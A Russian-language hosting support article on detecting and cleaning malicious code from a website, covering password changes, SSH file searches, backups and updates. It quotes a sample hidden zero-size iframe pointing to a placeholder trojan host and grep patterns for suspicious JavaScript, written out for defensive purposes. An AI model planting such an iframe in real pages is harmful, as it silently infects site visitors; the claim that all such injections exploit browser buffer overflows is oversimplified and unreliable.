Вирус на сайте — как его найти и удалить

В последнее время участились случаи заражения файлов сайтов вредоносными кодами (вирусами). Наличие вирусов на сайте очень опасно не только для посетителей, но может стать причиной блокировки сайта в поисковых системах.

Собственная безопасность прежде всего!

Первым делом проверьте свой компьютер на наличие вирусов с помощью антивирусных программ. Пароли доступа на сайт по FTP обычно воруют вирусы-трояны, которые заразили ваш компьютер или компьютер другого человека, знающего FTP-доступ к сайту. После того, как компьютер был проверен и очищен от вирусов, необходимо изменить пароли к FTP.

Следующим, и очень важным, этапом является лечение непосредственно сайта от вредоносного кода (вирусов). Прежде, чем искать вирусы на сайте, необходимо знать, как они выглядят и где именно их следует искать.

Существуют всего несколько самых распространённых кодов вирусов, которые используются для размещения на страницах сайтов. Все они используют одну и ту же уязвимость переполнения буфера браузеров. Уязвимость заключается в том, что с помощью специального кода (iframe) можно незаметно загрузить и запустить на компьютере жертвы любой файл. Первое, на что следует обратить внимание — это подозрительный HTML код с подключением типа <iframe>.

Пример кода вставки вируса:

<iframe src="http://адрес-сайта-с-трояном/" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>

Код представляет из себя скрытое окно нулевой ширины и высоты, которое невозможно обнаружить при визуальном просмотре страницы сайта в браузере, однако его наличие в исходном коде страницы не сулит ничего хорошего.

Еще один типичный пример наличия вируса — добавление в текст файлов сайта функции eval.

Как правило, заражению подвергаются файлы PHP-скриптов (в названии таких файлов используется расширение .php) и обычные HTML-страницы (расширение .html или .htm). Следует обращать внимание на дату модификации файлов. Посмотрите, какие из файлов были изменены совсем недавно. Если файлов на сайте немного, то их все можно просмотреть вручную и визуально найти подозрительные коды HTML или JavaScript, которые нужно будет удалить. Но иногда такой подход не помогает, т.к. некоторые вирусы маскируют своё присутствие и оставляют дату файла нетронутой.

Используем SSH

Очень удобный и быстрый способ работы с файлами, размещенными на веб-сервере, предоставляет протокол SSH (Secure Shell — «безопасная оболочка») — сетевой протокол прикладного уровня, позволяющий производить удалённое управление операционной системой и туннелирование TCP-соединений (например, для передачи файлов).

Приведём пример, который может значительно облегчить поиск заражённых файлов на сервере. Подозрительные файлы можно выявить командами следующего вида:

find $PWD -name '*.*' -exec grep -li "iframe" {} \; find $PWD -name '*.*' -exec grep -li "unescape" {} \; find $PWD -name '*.*' -exec grep -li "fromCharCode" {} \;

Выполнять их следует, подключившись к сайту по SSH и перейдя в корневую директорию сайта. Результатом выполнения команд будет нужный нам список файлов, которые содержат искомые подозрительные участки кода. Вам лишь потребуется проверить файлы по списку и, в случае необходимости, исправить их.

Резервная копия вам в помощь!

Если вредоносный код на сайт был добавлен несколько дней назад, то решить проблему с его очисткой можно путём восстановления файлов сайта из резервной копии. Для этого необходимо самостоятельно инициировать восстановление сайта и БД из резервной копии в панели управления хостингом или обратиться в службу техподдержки.

Чтобы защитить свой компьютер и обезопасить сайт против такого рода взломов, достаточно иметь выход в интернет и немного средств на покупку лицензии антивирусной программы.

Обновление — тоже защита

Обращаем ваше внимание на то, что часто вредоносный код добавляют, используя уязвимости в скриптах вашего сайта. В данном случае, решить такую проблему можно путём обновления их к последней стабильной версии, если их разработчики следят за своей системой и вовремя закрывают обнаруженные «дыры».

Убедившись, что вредоносный код и содержание полностью удалены с сайта, вы можете выполнить антивирусную проверку, используя специальный сервис от Google или обратиться в нашу службу техподдержки сайтов.

Дополнительная информация